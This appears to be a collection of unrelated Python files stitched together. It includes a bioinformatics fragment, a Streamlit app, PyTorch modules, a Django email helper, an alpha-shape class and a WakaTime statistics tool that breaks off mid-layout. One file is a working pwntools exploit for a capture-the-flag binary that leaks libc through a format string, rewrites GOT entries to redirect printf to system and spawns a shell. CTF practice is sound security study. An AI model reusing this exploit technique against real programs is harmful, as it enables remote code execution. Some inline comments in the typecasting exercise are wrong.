os.system('python pep_cds_filter.py %s %s %s'%(os.path.abspath(options.output_fasta+'.pep'),os.path.abspath(options.output_fasta+'.cds'),str(options.pep_length)))
if __name__ == "__main__":
main()
| nilq/baby-python | python |
import httpx
group_types = ("group", "supergroup")
http = httpx.AsyncClient(http2=True)
class Permissions:
can_be_edited = "can_be_edited"
delete_messages = "can_delete_messages"
restrict_members = "can_restrict_members"
promote_members = "can_promote_members"
change_info = "can_change_info"
invite_users = "can_invite_users"
pin_messages = "can_pin_messages"
| nilq/baby-python | python |
#!/usr/bin/python3
from pwn import *
binary = ELF('./dead-canary')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.update(arch='amd64',os='linux')
binary.symbols['main'] = 0x400737
offset = 6
libcoffset = 41
#p = process(binary.path)
p = remote('2020.redpwnc.tf', 31744)
# first pass, inf. retries if we blow out canary, leak libc
p.recvuntil('name: ')
payload = b'%' + str(libcoffset).encode().rjust(2,b'0') + b'$018p'
payload += fmtstr_payload(offset+1,{binary.got['__stack_chk_fail']:binary.symbols['main']},numbwritten=18)
payload += ((0x118 - 0x10 + 1) - len(payload)) * b'A'
p.send(payload)
p.recvuntil('Hello ')
_ = p.recv(18)
__libc_start_main = int(_,16) - 231
log.info('__libc_start_main: ' + hex(__libc_start_main))
baselibc = __libc_start_main - libc.symbols['__libc_start_main']
log.info('baselibc: ' + hex(baselibc))
libc.address = baselibc
# 2nd pass, printf -> system
p.recvuntil('name: ')
payload = fmtstr_payload(offset,{binary.got['printf']:libc.symbols['system']},numbwritten=0)
payload += ((0x118 - 0x10 + 1) - len(payload)) * b'A'
p.send(payload)
# take out the garbage
null = payload.find(b'\x00')
log.info('null loc: ' + str(null))
p.recvuntil(payload[null-2:null])
# final pass, flying blind
p.sendline('/bin/sh')
p.interactive()
| nilq/baby-python | python |
"""
Typcasting w. Integers & Floats
"""
# Convert these numbers into floats and back. Print out each result as well as its data type.
five = 5
zero = 0
neg_8 = -8
neg_22 = -22
five = float(five)
zero = float(zero)
neg_8 = float(neg_8)
neg_22 = float(neg_22)
print(five, type(five)) # 5.0 <class 'float'>
print(zero, type(zero)) # 0.0 <class 'float'>
print(neg_8, type(neg_8)) # -8.0 <class 'float'>
print(neg_22, type(neg_22)) # -22.0 <class 'float'>
five = int(five)
zero = int(zero)
neg_8 = int(neg_8)
neg_22 = int(neg_22)
print(five, type(five)) # 5.0 <class 'int'>
print(zero, type(zero)) # 0.0 <class 'int'>
print(neg_8, type(neg_8)) # -8.0 <class 'int'>
print(neg_22, type(neg_22)) # -22.0 <class 'int'>
| nilq/baby-python | python |
from io import StringIO
import json
import streamlit as st
from water_rocket import WaterRocket
def page_introduction(wr: WaterRocket) -> WaterRocket:
st.title("Open Water Rocket")
st.write("""
## Objectives
The goal of this app to provide a simple platform for analysing
water rocket design.
"""
)
st.warning("This is only a VERY initial prototype!")
st.write("""
---
## Load data
You can load a .json file with your project data,
or you may configure it in the tabs in the sidebar.
"""
)
data = st.file_uploader(
label="Upload json file",
type="json",
accept_multiple_files=False,
)
if data:
st.write("""
---
## Loaded Data
Data loaded successfully.
"""
)
data_str = StringIO(data.getvalue().decode("utf-8")).read()
data_json = json.loads(data_str)
st.json(data_json)
wr = WaterRocket(**data_json)
return wr
| nilq/baby-python | python |
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
class SurfaceClassifier(nn.Module):
def __init__(self, filter_channels, num_views=1, no_residual=True, last_op=None):
super(SurfaceClassifier, self).__init__()
self.filters = []
self.num_views = num_views
self.no_residual = no_residual
filter_channels = filter_channels
self.last_op = last_op
if self.no_residual:
for l in range(0, len(filter_channels) - 1):
self.filters.append(nn.Conv1d(
filter_channels[l],
filter_channels[l + 1],
1))
self.add_module("conv%d" % l, self.filters[l])
else:
for l in range(0, len(filter_channels) - 1):
if 0 != l:
self.filters.append(
nn.Conv1d(
filter_channels[l] + filter_channels[0],
filter_channels[l + 1],
1))
else:
self.filters.append(nn.Conv1d(
filter_channels[l],
filter_channels[l + 1],
1))
self.add_module("conv%d" % l, self.filters[l])
def forward(self, feature):
'''
:param feature: list of [BxC_inxHxW] tensors of image features
:param xy: [Bx3xN] tensor of (x,y) coodinates in the image plane
:return: [BxC_outxN] tensor of features extracted at the coordinates
'''
y = feature
tmpy = feature
for i, f in enumerate(self.filters):
if self.no_residual:
y = self._modules['conv' + str(i)](y)
else:
y = self._modules['conv' + str(i)](
y if i == 0
else torch.cat([y, tmpy], 1)
)
if i != len(self.filters) - 1:
y = F.leaky_relu(y)
if self.num_views > 1 and i == len(self.filters) // 2:
y = y.view(
-1, self.num_views, y.shape[1], y.shape[2]
).mean(dim=1)
tmpy = feature.view(
-1, self.num_views, feature.shape[1], feature.shape[2]
).mean(dim=1)
if self.last_op:
y = self.last_op(y)
return y
class neural_texture(nn.Module):
def __init__(self, filter_channels, num_views=1, no_residual=True, last_op=None):
super(neural_texture, self).__init__()
self.filters = []
self.num_views = num_views
self.no_residual = no_residual
filter_channels = filter_channels
self.last_op = last_op
if self.no_residual:
for l in range(0, len(filter_channels) - 1):
self.filters.append(nn.Conv1d(
filter_channels[l],
filter_channels[l + 1],
1))
self.add_module("conv%d" % l, self.filters[l])
else:
for l in range(0, len(filter_channels) - 1):
if 0 != l:
self.filters.append(
nn.Conv1d(
filter_channels[l] + filter_channels[0],
filter_channels[l + 1],
1))
else:
self.filters.append(nn.Conv1d(
filter_channels[l],
filter_channels[l + 1],
1))
self.add_module("conv%d" % l, self.filters[l])
def forward(self, feature):
'''
:param feature: list of [BxC_inxHxW] tensors of image features
:param xy: [Bx3xN] tensor of (x,y) coodinates in the image plane
:return: [BxC_outxN] tensor of features extracted at the coordinates
'''
y = feature
tmpy = feature
for i, f in enumerate(self.filters):
if self.no_residual:
y = self._modules['conv' + str(i)](y)
else:
y = self._modules['conv' + str(i)](
y if i == 0
else torch.cat([y, tmpy], 1)
)
if i != len(self.filters) - 1:
y = F.leaky_relu(y)
if self.num_views > 1 and i == len(self.filters) // 2:
y = y.view(
-1, self.num_views, y.shape[1], y.shape[2]
).mean(dim=1)
tmpy = feature.view(
-1, self.num_views, feature.shape[1], feature.shape[2]
).mean(dim=1)
if self.last_op:
y = self.last_op(y)
return y
class conv1_1(nn.Module):
def __init__(self, input_layers=256, output_layers=16, kernel_size=1, stride=1, padding=0, bias=True):
super(conv1_1, self).__init__()
self.model = nn.Conv2d(in_channels=input_layers, out_channels=output_layers, \
kernel_size=kernel_size, stride=stride, padding=padding, bias=bias)
self.sig = nn.Sigmoid()
def forward(self, x):
x = self.model(x)
x = self.sig(x)
return x*2-1
# class contrast_loss(nn.Module):
# # TODO: use precomputed face index map to only supervise the fore part.
# def __init__(self,rate=1) -> None:
# super(contrast_loss,self).__init__()
# self.temp1 = 100.
# self.temp2 = 10.
# self.criterion=nn.MSELoss()
# self.fake = torch.zeros((16,128,128)).to('cuda:0')
# self.rate = rate
# def forward(self, src, tgt):
# if isinstance(src, np.ndarray):
# src = torch.from_numpy(src)
# if isinstance(tgt, np.ndarray):
# tgt = torch.from_numpy(tgt)
# self.consist_loss = self.criterion(src,tgt)*self.temp1
# # print(self.consist_loss)
# if self.temp2 > 0:
# self.temp2-=self.rate
# self.differ_loss = -torch.log(self.criterion(src,self.fake.expand(src.shape[0],-1,-1,-1)))*self.temp2
# return self.differ_loss+self.consist_loss
# else:
# return self.consist_loss
class period_loss(nn.Module):
def __init__(self,r1=10,r2=1,r3=0.1,r4=0.01) -> None:
super(period_loss,self).__init__()
self.weights = [r1, r2, r3, r4]
# self.slice = [4,8,12,16]
self.criterion = nn.MSELoss()
def forward(self,x,y):
if x.shape[1]==16:
loss = 0.0
for i in range(4):
loss+=self.weights[i] * self.criterion(x[:,4*i:4*i+4], y[:,4*i:4*i+4])
return loss/4
if x.shape[1]==3:
return self.criterion(x, y)
if __name__=='__main__':
a = torch.rand((4,16,128,128))*2-1
b = torch.rand((4,16,128,128))*2-1
c = torch.ones((4,16,128,128))
d = torch.zeros((4,16,128,128))
ppp = period_loss(1,1,1,1)
f = ppp(c,d)
print(f) | nilq/baby-python | python |
class PushwooshException(Exception):
pass
class PushwooshCommandException(PushwooshException):
pass
class PushwooshNotificationException(PushwooshException):
pass
class PushwooshFilterException(PushwooshException):
pass
class PushwooshFilterInvalidOperatorException(PushwooshFilterException):
pass
class PushwooshFilterInvalidOperandException(PushwooshFilterException):
pass
| nilq/baby-python | python |
import socket
from smtplib import SMTPException
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
def send_email(instance):
context = {
"user": instance,
"api_key": instance.client.api_key,
}
email_subject = _(f"API Token Created")
email_body = render_to_string("core\email_message.txt", context)
emailBody = EmailMessage(
subject=email_subject,
body=email_body,
from_email="[email protected]",
to=(instance.email,),
cc="",
reply_to=("[email protected]",),
)
try:
emailBody.send(fail_silently=False)
print("token email sent")
# error due to email server
except SMTPException as e:
print(f"email failed due to {e}")
# error due to socket
except socket.gaierror as e:
print(f"email failed due to {e}")
| nilq/baby-python | python |
import numpy as np
from scipy.spatial import Delaunay
import matplotlib.pyplot as plt
from matplotlib.collections import LineCollection
class AlphaVisualization:
""" Visualization methods for AlphaShapes class. """
def plot_boundary(self, color='k', ax=None, **kwargs):
"""
Plot boundary of concave hull as a collection of line objects.
Args:
color (str or RGBA) - path color
ax (matplotlib.axes.AxesSubplot) - if None, create figure
kwargs: keyword arguments for matplotlib.LineCollection
"""
# create figure
if ax is None:
fig, ax = plt.subplots(figsize=(2, 2))
xmin, ymin = self.points.min(axis=0)
xmax, ymax = self.points.max(axis=0)
ax.set_xlim(xmin, xmax)
ax.set_ylim(ymin, ymax)
ax.axis('off')
# create line collection and add it to the axis
lines = LineCollection(self.boundary, colors=color, **kwargs)
ax.add_collection(lines)
# format axis
ax.set_aspect(1)
return ax
class AlphaShapes(AlphaVisualization):
"""
Object for computing the concave hull (alpha shape) of a set of points.
Attributes:
points (np.ndarray[float]) - points, shape (n,2)
alpha (float) - alpha value
only_outer (bool) - if True, only keep outer border
edge_indices (np.ndarray[int]) - (i,j) pairs representing edges of the alpha-shape. Indices (i,j) index the points array.
References:
stackoverflow: questions/50549128/boundary-enclosing-a-given-set-of-points
"""
def __init__(self, points, alpha, only_outer=True):
"""
Instantiate alpha shape object.
Args:
points (np.ndarray[float]) - points, shape (n,2)
alpha (float) - alpha value
only_outer (bool) - if True, only keep outer border
"""
self.points = points
self.alpha = alpha
self.only_outer = only_outer
edge_indices = self._alpha_shape(points, alpha, only_outer=only_outer)
self.edge_indices = np.array(list(edge_indices))
def __call__(self, xy):
""" Test whether each point in <xy> lies within the alpha shape. """
f = np.vectorize(lambda x, y: self._is_inside(x, y, self.points, self.edges))
return f(xy.T)
@property
def boundary(self):
""" Boundary line segments. """
return self.points[self.edge_indices]
@staticmethod
def _alpha_shape(points, alpha, only_outer=True):
"""
Compute the concave hull (alpha shape) of a set of points.
Args:
points (np.ndarray[float]) - points, shape (n,2)
alpha (float) - alpha value
only_outer (bool) - if True, only keep outer border
Returns:
boundary (list of tuples) - Set of (i,j) pairs representing edges of the alpha-shape. Indices (i,j) index the points array.
References:
https://stackoverflow.com/questions/50549128/boundary-enclosing-a-given-set-of-points
"""
assert points.shape[0] > 3, "Need at least four points"
def add_edge(edges, i, j):
""" Add a line between the i-th and j-th points if it's not already in the list. """
if (i, j) in edges or (j, i) in edges:
# already added
assert (j, i) in edges, "Can't go twice over same directed edge right?"
if only_outer:
# if both neighboring triangles are in shape, it's not a boundary edge
edges.remove((j, i))
return
edges.add((i, j))
tri = Delaunay(points)
edges = set()
# Loop over triangles:
# ia, ib, ic = indices of corner points of the triangle
for ia, ib, ic in tri.vertices:
pa = points[ia]
pb = points[ib]
pc = points[ic]
# Computing radius of triangle circumcircle
# www.mathalino.com/reviewer/derivation-of-formulas/derivation-of-formula-for-radius-of-circumcircle
a = np.sqrt((pa[0] - pb[0]) ** 2 + (pa[1] - pb[1]) ** 2)
b = np.sqrt((pb[0] - pc[0]) ** 2 + (pb[1] - pc[1]) ** 2)
c = np.sqrt((pc[0] - pa[0]) ** 2 + (pc[1] - pa[1]) ** 2)
s = (a + b + c) / 2.0
area = np.sqrt(s * (s - a) * (s - b) * (s - c))
circum_r = a * b * c / (4.0 * area)
if circum_r < alpha:
add_edge(edges, ia, ib)
add_edge(edges, ib, ic)
add_edge(edges, ic, ia)
return edges
@staticmethod
def _is_inside(x, y, points, edges, eps=1.0e-10):
"""
Check if point (<x>, <y>) lies within the alpha shape defined by <points> and <edges>.
"""
intersection_counter = 0
for i, j in edges:
assert abs((points[i,1]-y)*(points[j,1]-y)) > eps, 'Need to handle these end cases separately'
y_in_edge_domain = ((points[i,1]-y)*(points[j,1]-y) < 0)
if y_in_edge_domain:
upper_ind, lower_ind = (i,j) if (points[i,1]-y) > 0 else (j,i)
upper_x = points[upper_ind, 0]
upper_y = points[upper_ind, 1]
lower_x = points[lower_ind, 0]
lower_y = points[lower_ind, 1]
# is_left_turn predicate is evaluated with: sign(cross_product(upper-lower, p-lower))
cross_prod = (upper_x - lower_x)*(y-lower_y) - (upper_y - lower_y)*(x-lower_x)
assert abs(cross_prod) > eps, 'Need to handle these end cases separately'
point_is_left_of_segment = (cross_prod > 0.0)
if point_is_left_of_segment:
intersection_counter = intersection_counter + 1
return (intersection_counter % 2) != 0
| nilq/baby-python | python |
import os.path
import argparse
import json
import yaml
from datetime import datetime
import numpy as np
import plotly.graph_objects as go
import plotly.express as px
import ctypes
import PySimpleGUI as sg
class Stats:
'''Yliluokka, joka sisältää päivämäärät sekä metodin näiden muuttamiseksi oikeaan muotoon ja metodin sekuntien muuttamiseksi tunneiksi.'''
days = []
@classmethod
def convert_dates(cls, days=days):
'''Muuntaa merkkijonoina olevat päivämäärät oikean tyyppisiksi.'''
for index, day in enumerate(days):
days[index] = datetime(int(day[0:4]), int(day[5:7]), int(day[8:10])).date()
@staticmethod
def seconds_to_hours(seconds):
'''Muuntaa parametrina annetut sekunnit tunneiksi.'''
hours = seconds / 3600
return hours
@staticmethod
def fetch_days_and_labels(data, days=days, languages=None, editors=None, operating_systems=None, ignored_stats=[], searched_stats=[]):
'''Lisää päivät listaan ja avaimet haluttuihin hakurakenteisiin.'''
#Käydään läpi kaikki päivät
for day in data["days"]:
#Ohitetaan päivä käyttäjän antamista argumenteista riippuen
if day["date"] < str(start_date):
continue
elif day["date"] > str(end_date):
continue
#Päivämäärät
days.append(day["date"])
#Kielet
if languages is not None:
for language in day["languages"]:
if len(searched_stats) == 0:
if language["name"] in ignored_stats:
continue
elif language["name"] not in languages:
languages[language["name"]] = []
else:
if language["name"] not in searched_stats:
continue
elif language["name"] not in languages:
languages[language["name"]] = []
#Editorit
if editors is not None:
for editor in day["editors"]:
if len(searched_stats) == 0:
if editor["name"] in ignored_stats:
continue
elif editor["name"] not in editors:
editors[editor["name"]] = []
else:
if editor["name"] not in searched_stats:
continue
elif editor["name"] not in editors:
editors[editor["name"]] = []
#Käyttöjärjestelmät
if operating_systems is not None:
for operating_system in day["operating_systems"]:
if len(searched_stats) == 0:
if operating_system["name"] in ignored_stats:
continue
elif operating_system["name"] not in operating_systems:
operating_systems[operating_system["name"]] = []
else:
if operating_system["name"] not in searched_stats:
continue
elif operating_system["name"] not in operating_systems:
operating_systems[operating_system["name"]] = []
class LanguagesStats(Stats):
'''Aliluokka, joka sisältää tiedot eri ohjelmointikielistä.'''
def __init__(self):
self.languages = {}
self.keys = []
self.total_times = []
def populate_stats(self, data):
'''Lisää kielten tiedot hakurakenteeseen.
Parametrit:
data -- JSON-tiedostosta luetut tiedot.
'''
#Kuinka monen päivän tiedot on lisätty kieliin
number_of_days = 0
#Käydään läpi kaikki päivät
for day in data["days"]:
#Ohitetaan päivä käyttäjän antamista argumenteista riippuen
if day["date"] < str(start_date):
continue
elif day["date"] > str(end_date):
continue
number_of_days += 1
#Jos päivälle ei löydy tietoja kielistä
if len(day["languages"]) == 0:
#Lisätään kaikkiin ohjelmointikieliin nolla tuntia kyseiselle päivälle
for language in self.languages:
self.languages[language].append(0.0)
#Jos päivälle löytyy tietoja kielistä
else:
#Käydään läpi kaikki kielet
for language in day["languages"]:
#Ohitetaan kieli käyttäjän halutessa
if len(searched_stats) == 0:
if language["name"] in ignored_stats:
continue
else:
if language["name"] not in searched_stats:
continue
#Lisätään kieleen kyseisen päivän tiedot tunneiksi muutettuna
self.languages[language["name"]].append(Stats.seconds_to_hours(language["total_seconds"]))
#Käydään läpi kaikki kielet
for language in self.languages:
#Jos kielen tiedoista puuttuu päivä, lisätään nolla tuntia kyseiselle päivälle
if len(self.languages[language]) < number_of_days:
self.languages[language].append(0.0)
def sort_stats_and_populate_keys(self):
'''Järjestää tiedot eniten käytetystä vähiten käytettyyn ja täyttää avaimet oikeassa järjestyksessä.'''
total_hours = 0
#Käydään läpi kielet
for language in self.languages:
#Lasketaan kielen päivittäiset ajat yhteen
hours = sum(self.languages[language])
#Lisätään aika kokonaisaikaan
total_hours += hours
#Lisätään kokonaisaika ja avain listoihin
self.total_times.append(hours)
self.keys.append(language)
if minimum_labeling_percentage != 0.0:
self.unify_stats()
#Muutetaan järjestys eniten käytetystä vähiten käytettyyn, muuttuvat tupleiksi
self.total_times, self.keys = zip(*sorted(zip(self.total_times, self.keys), reverse=True))
def unify_stats(self):
'''Yhdistää tiedot otsikon Other alle tietyn raja-arvon mukaisesti.'''
removed_at_indexes = []
#Lisätään tarvittaessa otsikko Other
if "Other" not in self.keys:
self.keys.append("Other")
self.total_times.append(0.0)
self.languages["Other"] = [0.0 for value in self.languages[self.keys[0]]]
#Lisätään raja-arvon alittavat osuudet Otheriin
for index, total_time in enumerate(self.total_times):
if self.keys[index] == "Other":
continue
elif total_time / sum(self.total_times) * 100.0 < minimum_labeling_percentage:
self.languages["Other"] = np.add(self.languages["Other"], self.languages[self.keys[index]]).tolist()
self.total_times[self.keys.index("Other")] += self.total_times[index]
removed_at_indexes.append(index)
#Poistetaan Other-otsikko ja sen tiedot, jos se on turha, ja poistutaan metodista
if len(removed_at_indexes) == 0:
del(self.total_times[self.keys.index("Other")])
del(self.languages["Other"])
self.keys.remove("Other")
return
#Poistetaan Otheriin yhdistettyjen tietojen päivittäiset tiedot, otsikot ja kokonaisajat
for index in reversed(removed_at_indexes):
del(self.languages[self.keys[index]])
del(self.keys[index])
del(self.total_times[index])
class EditorsStats(Stats):
'''Aliluokka, joka sisältää tiedot eri editoreille.'''
def __init__(self):
self.editors = {}
self.keys = []
self.total_times = []
def populate_stats(self, data):
'''Lisää editorien tiedot hakurakenteeseen.
Parametrit:
data -- JSON-tiedostosta luetut tiedot.
'''
#Kuinka monen päivän tiedot on lisätty editoreihin
number_of_days = 0
#Käydään läpi kaikki päivät
for day in data["days"]:
#Ohitetaan päivä käyttäjän antamista argumenteista riippuen
if day["date"] < str(start_date):
continue
elif day["date"] > str(end_date):
continue
number_of_days += 1
#Jos päivälle ei löydy tietoja editoreista
if len(day["editors"]) == 0:
#Lisätään kaikkiin editoreihin nolla tuntia kyseiselle päivälle
for editor in self.editors:
self.editors[editor].append(0.0)
#Jos päivälle löytyy tietoja editoreista
else:
#Käydään läpi kaikki editorit
for editor in day["editors"]:
#Ohitetaan editori käyttäjän halutessa
if len(searched_stats) == 0:
if editor["name"] in ignored_stats:
continue
else:
if editor["name"] not in searched_stats:
continue
#Lisätään editoriin kyseisen päivän tiedot tunneiksi muutettuna
self.editors[editor["name"]].append(Stats.seconds_to_hours(editor["total_seconds"]))
#Käydään läpi kaikki editorit
for editor in self.editors:
#Jos editorin tiedoista puuttuu päivä, lisätään nolla tuntia kyseiselle päivälle
if len(self.editors[editor]) < number_of_days:
self.editors[editor].append(0.0)
def sort_stats_and_populate_keys(self):
'''Järjestää tiedot eniten käytetystä vähiten käytettyyn ja täyttää avaimet oikeassa järjestyksessä.'''
total_hours = 0
#Käydään läpi editorit
for editor in self.editors:
#Lasketaan editorin päivittäiset ajat yhteen
hours = sum(self.editors[editor])
#Lisätään aika kokonaisaikaan
total_hours += hours
#Lisätään kokonaisaika ja avain listoihin
self.total_times.append(hours)
self.keys.append(editor)
if minimum_labeling_percentage != 0.0:
self.unify_stats()
#Muutetaan järjestys eniten käytetystä vähiten käytettyyn, muuttuvat tupleiksi
self.total_times, self.keys = zip(*sorted(zip(self.total_times, self.keys), reverse=True))
def unify_stats(self):
'''Yhdistää tiedot otsikon Other alle tietyn raja-arvon mukaisesti.'''
removed_at_indexes = []
#Lisätään tarvittaessa otsikko Other
if "Other" not in self.keys:
self.keys.append("Other")
self.total_times.append(0.0)
self.editors["Other"] = [0.0 for value in self.editors[self.keys[0]]]
#Lisätään raja-arvon alittavat osuudet Otheriin
for index, total_time in enumerate(self.total_times):
if self.keys[index] == "Other":
continue
elif total_time / sum(self.total_times) * 100.0 < minimum_labeling_percentage:
self.editors["Other"] = np.add(self.editors["Other"], self.editors[self.keys[index]]).tolist()
self.total_times[self.keys.index("Other")] += self.total_times[index]
removed_at_indexes.append(index)
#Poistetaan Other-otsikko ja sen tiedot, jos se on turha, ja poistutaan metodista
if len(removed_at_indexes) == 0:
del(self.total_times[self.keys.index("Other")])
del(self.editors["Other"])
self.keys.remove("Other")
return
#Poistetaan Otheriin yhdistettyjen tietojen päivittäiset tiedot, otsikot ja kokonaisajat
for index in reversed(removed_at_indexes):
del(self.editors[self.keys[index]])
del(self.keys[index])
del(self.total_times[index])
class OperatingSystemsStats(Stats):
'''Aliluokka, joka sisältää tiedot eri käyttöjärjestelmille.'''
def __init__(self):
self.operating_systems = {}
self.keys = []
self.total_times = []
def populate_stats(self, data):
'''Lisää käyttöjärjestelmien tiedot hakurakenteeseen.
Parametrit:
data -- JSON-tiedostosta luetut tiedot.
'''
#Kuinka monen päivän tiedot on lisätty käyttöjärjestelmiin
number_of_days = 0
#Käydään läpi kaikki päivät
for day in data["days"]:
#Ohitetaan päivä käyttäjän antamista argumenteista riippuen
if day["date"] < str(start_date):
continue
elif day["date"] > str(end_date):
continue
number_of_days += 1
#Jos päivälle ei löydy tietoja käyttöjärjestelmistä
if len(day["operating_systems"]) == 0:
#Lisätään kaikkiin käyttöjärjestelmiin nolla tuntia kyseiselle päivälle
for operating_system in self.operating_systems:
self.operating_systems[operating_system].append(0.0)
#Jos päivälle löytyy tietoja käyttöjärjestelmistä
else:
#Käydään läpi kaikki käyttöjärjestelmät
for operating_system in day["operating_systems"]:
#Ohitetaan käyttöjärjestelmä käyttäjän halutessa
if len(searched_stats) == 0:
if operating_system["name"] in ignored_stats:
continue
else:
if operating_system["name"] not in searched_stats:
continue
#Lisätään käyttöjärjestelmään kyseisen päivän tiedot tunneiksi muutettuna
self.operating_systems[operating_system["name"]].append(Stats.seconds_to_hours(operating_system["total_seconds"]))
#Käydään läpi kaikki käyttöjärjestelmät
for operating_system in self.operating_systems:
#Jos käyttöjärjestelmän tiedoista puuttuu päivä, lisätään nolla tuntia kyseiselle päivälle
if len(self.operating_systems[operating_system]) < number_of_days:
self.operating_systems[operating_system].append(0.0)
def sort_stats_and_populate_keys(self):
'''Järjestää tiedot eniten käytetystä vähiten käytettyyn ja täyttää avaimet oikeassa järjestyksessä.'''
total_hours = 0
#Käydään läpi käyttöjärjestelmät
for operating_system in self.operating_systems:
#Lasketaan käyttöjärjestelmän päivittäiset ajat yhteen
hours = sum(self.operating_systems[operating_system])
#Lisätään aika kokonaisaikaan
total_hours += hours
#Lisätään kokonaisaika ja avain listoihin
self.total_times.append(hours)
self.keys.append(operating_system)
if minimum_labeling_percentage != 0.0:
self.unify_stats()
#Muutetaan järjestys eniten käytetystä vähiten käytettyyn, muuttuvat tupleiksi
self.total_times, self.keys = zip(*sorted(zip(self.total_times, self.keys), reverse=True))
def unify_stats(self):
'''Yhdistää tiedot otsikon Other alle tietyn raja-arvon mukaisesti.'''
removed_at_indexes = []
#Lisätään tarvittaessa otsikko Other
if "Other" not in self.keys:
self.keys.append("Other")
self.total_times.append(0.0)
self.operating_systems["Other"] = [0.0 for value in self.operating_systems[self.keys[0]]]
#Lisätään raja-arvon alittavat osuudet Otheriin
for index, total_time in enumerate(self.total_times):
if self.keys[index] == "Other":
continue
elif total_time / sum(self.total_times) * 100.0 < minimum_labeling_percentage:
self.operating_systems["Other"] = np.add(self.operating_systems["Other"], self.operating_systems[self.keys[index]]).tolist()
self.total_times[self.keys.index("Other")] += self.total_times[index]
removed_at_indexes.append(index)
#Poistetaan Other-otsikko ja sen tiedot, jos se on turha, ja poistutaan metodista
if len(removed_at_indexes) == 0:
del(self.total_times[self.keys.index("Other")])
del(self.operating_systems["Other"])
self.keys.remove("Other")
return
#Poistetaan Otheriin yhdistettyjen tietojen päivittäiset tiedot, otsikot ja kokonaisajat
for index in reversed(removed_at_indexes):
del(self.operating_systems[self.keys[index]])
del(self.keys[index])
del(self.total_times[index])
#Piirretään kuvaajat
def draw_graph(days, keys, datasets, colors_file_path):
with open(colors_file_path, "r") as colors_file:
colors_data = yaml.safe_load(colors_file)
fig = go.Figure()
#Käydään läpi kaikki tiedot
for key in keys:
try:
fig.add_trace(go.Scatter(x=days, y=datasets[key], mode="lines", name=key, marker=dict(color=colors_data[key]["color"])))
except Exception:
fig.add_trace(go.Scatter(x=days, y=datasets[key], mode="lines", name=key, marker=dict(color=colors_data["Other"]["color"])))
fig.update_layout(yaxis_title="t (h)", plot_bgcolor="white")
fig.update_xaxes(showline=True, linewidth=1, linecolor="black", mirror=True)
fig.update_yaxes(showline=True, linewidth=1, linecolor="black", mirror=True)
fig.show()
#Piirretään ympyrädiagrammi
def draw_pie_chart(keys, total_times, colors_file_path):
labels = []
colors = []
total_hours = 0
with open(colors_file_path, "r") as colors_file:
colors_data = yaml.safe_load(colors_file)
#Käydään läpi kaikki tiedot
for index, key in enumerate(keys):
hours = total_times[index]
#Lisätään aika kokonaisaikaan
total_hours += hours
#Lisätään otsikko listoihin
labels.append(key + " - {0} h {1} min".format(int(hours), int((hours - int(hours)) * 60)))
try:
colors.append(colors_data[key]["color"])
except Exception:
colors.append(colors_data["Other"]["color"])
#Lisätään prosenttiosuudet selitteeseen
for index, time in enumerate(total_times):
labels[index] += " ({0:.2f} %)".format(total_times[index] / total_hours * 100)
#Piirretään ympyrädiagrammi
fig = px.pie(names=labels, values=total_times, color_discrete_sequence=colors)
fig.update_traces(marker=dict(line=dict(color="black", width=0.5)), textinfo="none", hovertemplate=labels)
fig.show()
#Varsinainen ohjelma
if __name__ == "__main__":
#Valmistellaan argumenttien lukeminen
parser = argparse.ArgumentParser(
description="You can use this program to show your statistics from WakaTime.",
usage="python WakaFree.py {-h | -G | [-g GRAPHS] [-t TOTALS] [{-i IGNORE | -s SEARCH}] [-m MINIMUM_LABELING_PERCENTAGE] [--start-date START_DATE] [--end-date END_DATE] FILE}")
parser.add_argument("file", metavar="FILE", nargs="?", default="", help="path to file with statistics")
parser.add_argument("-G", "--gui", action="store_true", help="use graphical user interface")
parser.add_argument("-g", "--graphs", help="show daily statistics: string with l, e, o for languages, editors, operating systems")
parser.add_argument("-t", "--totals", help="show total times: string with l, e, o for languages, editors, operating systems")
parser.add_argument("-i", "--ignore", help="ignored stats: string with labels separated by commas (without spaces)")
parser.add_argument("-s", "--search", help="stats to search for: string with labels separated by commas (without spaces)")
parser.add_argument("-m", "--minimum-labeling-percentage", help="add together (under label Other) stats with lesser percentage than the given value")
parser.add_argument("--start-date", help="start date in format YYYY-MM-DD (inclusive)")
parser.add_argument("--end-date", help="end date in format YYYY-MM-DD (inclusive)")
#Luetaan argumentit
args = parser.parse_args()
file_name = args.file if args.file else ""
graphs = args.graphs if args.graphs else ""
totals = args.totals if args.totals else ""
ignored_stats = args.ignore.split(",") if args.ignore else []
searched_stats = args.search.split(",") if args.search else []
minimum_labeling_percentage = float(args.minimum_labeling_percentage) if args.minimum_labeling_percentage else 0.0
start_date = datetime(int(args.start_date[0:4]), int(args.start_date[5:7]), int(args.start_date[8:10])).date() if args.start_date else datetime(1, 1, 1).date()
end_date = datetime(int(args.end_date[0:4]), int(args.end_date[5:7]), int(args.end_date[8:10])).date() if args.end_date else datetime(9999, 12, 31).date()
#Jos käyttäjä haluaa graafisen käyttöliittymän
if args.gui:
try:
ctypes.windll.shcore.SetProcessDpiAwareness(True)
except:
pass
help_file = "The file that contains your statistics."
help_graphs = "Daily statistics."
help_totals = "Total times."
help_ignore = "Ignored stats. Labels separated by commas and nothing more."
help_search = "Stats to search for. Labels separated by commas and nothing more.\nIf nothing is entered then all the stats in the given file will be read."
help_minimum_labeling_percentage = "Inclusive lover limit for labeling the stats.\nEverything under this percentage will be moved to the group Other."
help_start_date = "Start date in format YYYY-MM-DD. Inclusive.\nIf no date is entered then the stats will be drawn from the very beginning."
help_end_date = "End date in format YYYY-MM-DD. Inclusive.\nIf no date is entered then the stats will be drawn to the very end."
layout = [
[sg.Text("Hover over a variable name to get help.")],
[sg.HorizontalSeparator()],
[sg.Text("File*", tooltip=help_file), sg.InputText(key="input_file"), sg.FileBrowse(file_types=(("JSON Files", "*.json"),))],
[
sg.Text("Graphs", tooltip=help_graphs),
sg.Checkbox("Languages", default=True, key="input_graphs_l"),
sg.Checkbox("Editors", default=True, key="input_graphs_e"),
sg.Checkbox("Operating systems", default=True, key="input_graphs_o")
],
[
sg.Text("Totals", tooltip=help_totals),
sg.Checkbox("Languages", default=True, key="input_totals_l"),
sg.Checkbox("Editors", default=True, key="input_totals_e"),
sg.Checkbox("Operating systems", default=True, key="input_totals_o")
],
[sg.Text("Ignore**", tooltip=help_ignore), sg.InputText(key="input_ignore"), sg.Text("or"), sg.Text("Search**", tooltip=help_search), sg.InputText(key="input_search")],
